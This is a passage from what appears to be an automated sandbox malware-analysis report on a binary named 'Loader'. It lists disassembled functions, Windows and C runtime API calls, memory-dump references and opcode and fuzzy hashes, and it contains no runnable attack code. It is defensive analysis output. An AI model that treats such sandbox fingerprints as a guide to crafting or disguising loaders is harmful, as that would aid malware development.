                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0094BF84,000000FF,?,00935775,0093565C,?,00935811,00000000), ref: 0093571D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 83969f3a92913ea3967f170b0d581d26a87ebd5a2dfda738a7e1c8882eadca6f
                                                                                                  • Instruction ID: 098dcab3eb51cd47c21b0a3688c060c76b7316d1dfeed41f468e80aa48f010c4
                                                                                                  • Opcode Fuzzy Hash: 83969f3a92913ea3967f170b0d581d26a87ebd5a2dfda738a7e1c8882eadca6f
                                                                                                  • Instruction Fuzzy Hash: 8E01A231964719EFDB01CF55CC05BAEB7B8FB48B1AF010525F852A2290DB759900CB90
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0093D85F
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0093D928
                                                                                                  • __freea.LIBCMT ref: 0093D98F
                                                                                                    • Part of subcall function 0093C001: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,0092A81D,00000018,?,00923EEA,00000018,00000000), ref: 0093C033
                                                                                                  • __freea.LIBCMT ref: 0093D9A2
                                                                                                  • __freea.LIBCMT ref: 0093D9AF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096550386-0
                                                                                                  • Opcode ID: 54d75b4f3754a3723fb12adef2dba45e19932529ea1e7f28ae67128e6c6e4d28
                                                                                                  • Instruction ID: feea670c41c1c43a184aee5dda77e098cb3f219aa04ed9ccd9bcf52558caff58
                                                                                                  • Opcode Fuzzy Hash: 54d75b4f3754a3723fb12adef2dba45e19932529ea1e7f28ae67128e6c6e4d28
                                                                                                  • Instruction Fuzzy Hash: 3451B1B6602206AFEB21AF65EC51FBB36ADEF84710F150528FD04E6151EB75DC108FA2
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32(?,0092F0BE,00928FD0,00000000,?,00928FD0,0092A490), ref: 0092F0F5
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00928FD8), ref: 0092F114
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00928FD8,0092A490,?), ref: 0092F142
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00928FD8,0092A490,?), ref: 0092F19D
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00928FD8,0092A490,?), ref: 0092F1B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 66001078-0
                                                                                                  • Opcode ID: 5a1e92711aa70f57d82eb04563303efe76d1ff6a00f7162b61cc5bf1940d85ef
                                                                                                  • Instruction ID: 30c7f73e37054134540e3e99747577cec98e8e08b0b17e292ab4a1acc9d52b8a
                                                                                                  • Opcode Fuzzy Hash: 5a1e92711aa70f57d82eb04563303efe76d1ff6a00f7162b61cc5bf1940d85ef
                                                                                                  • Instruction Fuzzy Hash: 84417C3150872ADFCB24DF65E8A096AB3F9FF04311BA04A39D456C794AD730F9A4CB50
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00923E45
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00923E5F
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00923E80
                                                                                                  • __Getctype.LIBCPMT ref: 00923F32
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00923F78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                  • String ID:
                                                                                                  • API String ID: 3087743877-0
                                                                                                  • Opcode ID: c87ee63dd5028d964780eee942c00e084a2597e95b68bf0bd1000bee52dc7bf5
                                                                                                  • Instruction ID: 166dbd62108c59295251ec386132e65fcc1fba1655644ba6d9e3ba2dc6b19e68
                                                                                                  • Opcode Fuzzy Hash: c87ee63dd5028d964780eee942c00e084a2597e95b68bf0bd1000bee52dc7bf5
                                                                                                  • Instruction Fuzzy Hash: 06418DB1D003248FCB10DF95E841BAEBBB5FF88710F048119D8156B399DB38AA05CF91
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0092D5B9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0092D5C3
                                                                                                  • int.LIBCPMT ref: 0092D5DA
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::_Lockit.LIBCPMT ref: 0092C2E6
                                                                                                    • Part of subcall function 0092C2D5: std::_Lockit::~_Lockit.LIBCPMT ref: 0092C300
                                                                                                  • codecvt.LIBCPMT ref: 0092D5FD
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0092D634
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                  • String ID:
                                                                                                  • API String ID: 3716348337-0
                                                                                                  • Opcode ID: 61ebc0ef329aaf863e9ca8e765bf05a56a2fad699ca2c6528d6ab2536e612a42
                                                                                                  • Instruction ID: 84917222c3e65a791201ff60ae7cc1841bbbb28a55283fc613d7a238adcb2c12
                                                                                                  • Opcode Fuzzy Hash: 61ebc0ef329aaf863e9ca8e765bf05a56a2fad699ca2c6528d6ab2536e612a42
                                                                                                  • Instruction Fuzzy Hash: 8201D2729012398FCB05EBA4E951BAD77B5AFC0320F240419F8146B289CF789E04CB81
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0092AF7E
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0092AF89
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0092AFF7
                                                                                                    • Part of subcall function 0092AE4A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0092AE62
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 0092AFA4
                                                                                                  • _Yarn.LIBCPMT ref: 0092AFBA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: 09170029a6bdc28f1b943d813a03f160616c4fe7d6c3a3d48fc2afb7e06220f0
                                                                                                  • Instruction ID: 2a588a339e476fb1243ebeb69226fb67b6f7ee78143af03e9ab64667fa32c3c4
                                                                                                  • Opcode Fuzzy Hash: 09170029a6bdc28f1b943d813a03f160616c4fe7d6c3a3d48fc2afb7e06220f0
                                                                                                  • Instruction Fuzzy Hash: 82017CB66057219FCB06EB21E862A7D7BA6FFC4351B144019E80557385CF38AE42DF82
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 4218353326-1866435925
                                                                                                  • Opcode ID: eb509b6ee76d7b83b0697b616aeb3f2a6890265f973696f7d4e8c44fe67d2607
                                                                                                  • Instruction ID: fe52d2f7c0029f8ae4088de26fa664af2f4dcdfe965cf71f1a782190cebdd4a0
                                                                                                  • Opcode Fuzzy Hash: eb509b6ee76d7b83b0697b616aeb3f2a6890265f973696f7d4e8c44fe67d2607
                                                                                                  • Instruction Fuzzy Hash: 05F17E75A012248FCB14CF68D494BADBBF1FF88324F198259E855AB3A5C734ED41CB90
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 0092B8F9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: b7df0bb7ea12cd873e3d481aa180d1886361d34c334b6f0d1578f4f9c752cdec
                                                                                                  • Instruction ID: 4a03610e708f8d72a8d92c28becba04c641be7a0d40e126bebff969fc77158e8
                                                                                                  • Opcode Fuzzy Hash: b7df0bb7ea12cd873e3d481aa180d1886361d34c334b6f0d1578f4f9c752cdec
                                                                                                  • Instruction Fuzzy Hash: 0421F579804629EFCF389F64E446BAEB7ECEF40324F148A1EE405D7294D7349A80CB90
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00946ACC,00000000,?,0095D2B0,?,?,?,00946A03,00000004,InitializeCriticalSectionEx,00950D44,00950D4C), ref: 00946A3D
                                                                                                  • GetLastError.KERNEL32(?,00946ACC,00000000,?,0095D2B0,?,?,?,00946A03,00000004,InitializeCriticalSectionEx,00950D44,00950D4C,00000000,?,0093BCAC), ref: 00946A47
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00946A6F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: 373eb3cedfaa3fdb1344077f46a5733d43bdc3fd628fc09ff3a2f54042760871
                                                                                                  • Instruction ID: 4e94a43c4853497a0a71caa58de0176d864b43425b89cd4a38acf35f8eed297b
                                                                                                  • Opcode Fuzzy Hash: 373eb3cedfaa3fdb1344077f46a5733d43bdc3fd628fc09ff3a2f54042760871
                                                                                                  • Instruction Fuzzy Hash: 1AE01A70384704BAEB205FA2EC06F393B689B51B46F908420FA4CA94E0DB62E8149646
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 009440F1
                                                                                                    • Part of subcall function 0093C111: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093D985,?,00000000,-00000008), ref: 0093C172
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00944343
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00944389
                                                                                                  • GetLastError.KERNEL32 ref: 0094442C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: d1d2cb5556cdd1ac14ef089d8ae513b1225f47431f611b822902a99f55ac23d6
                                                                                                  • Instruction ID: 29e698ffeec422e8c9c11f0e510fbf735a03d6730ff34f52927a7a5027d8e061
                                                                                                  • Opcode Fuzzy Hash: d1d2cb5556cdd1ac14ef089d8ae513b1225f47431f611b822902a99f55ac23d6
                                                                                                  • Instruction Fuzzy Hash: FED16975E052589FCF15CFE9C880AEDBBB8FF49304F24452AE856EB262D630A941CF50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: fe4182927d1328dff69bc8033e74a1a89736df9ac8f901d18034d08056c91194
                                                                                                  • Instruction ID: b7e1672910fe4c7856822174728ff05f32253cb9cd9893ea26f80887197e1db2
                                                                                                  • Opcode Fuzzy Hash: fe4182927d1328dff69bc8033e74a1a89736df9ac8f901d18034d08056c91194
                                                                                                  • Instruction Fuzzy Hash: 5A51E272A017069FDB28CF55E865BAA77A8EF80710F14452DEE06876A2D735EC40CF94
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00927465
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00927535
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00927543
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00927551
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2261580123-0
                                                                                                  • Opcode ID: f9969e517fe60e1855c186065a9aa39a5ff39f438a9fe7ffe1c098cb9cc5ce8b
                                                                                                  • Instruction ID: 63109fb9ffb9a5265cf0e10427f1bb3af95a625028f1f2ba920fa1c1398b861e
                                                                                                  • Opcode Fuzzy Hash: f9969e517fe60e1855c186065a9aa39a5ff39f438a9fe7ffe1c098cb9cc5ce8b
                                                                                                  • Instruction Fuzzy Hash: CE411CB19043258BDB20EFA4E841B5BF7B9FF84320F144539E45A576A5E734E801CB91
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00924635
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00924652
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00924673
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00924720
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID:
                                                                                                  • API String ID: 593203224-0
                                                                                                  • Opcode ID: e504a97ccfe2f7387603af238270422223536a050316f25dfab46189bb2bdae3
                                                                                                  • Instruction ID: 30dff4646f9412ac95e8b7a56baa57f98035ca262a0846d5f6e2e719c3500ea6
                                                                                                  • Opcode Fuzzy Hash: e504a97ccfe2f7387603af238270422223536a050316f25dfab46189bb2bdae3
                                                                                                  • Instruction Fuzzy Hash: 49415AB5D003298FCB10DF95E884BAEBBB9FB49321F044619E8156B395D734AD44CFA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C111: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093D985,?,00000000,-00000008), ref: 0093C172
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00941F1A
                                                                                                  • __dosmaperr.LIBCMT ref: 00941F21
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00941F5B
                                                                                                  • __dosmaperr.LIBCMT ref: 00941F62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 236f42a987d4f356521d883b6ab7014a7025f1bbdf199fe1ea0124c7d0ce9fa8
                                                                                                  • Instruction ID: ed71c90dcf9bf40e3cc8271f4f86fc07716585dd1c0ead68118e0e7e13aea541
                                                                                                  • Opcode Fuzzy Hash: 236f42a987d4f356521d883b6ab7014a7025f1bbdf199fe1ea0124c7d0ce9fa8
                                                                                                  • Instruction Fuzzy Hash: 4621D771604205AFCB20AF76CC81D2BF7ADFF44364B108559FC6597150DB31EC818B90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e10a5a51f28701f78bf7e41e0eca4375edc549aa650e94c600aeb0afa70d0404
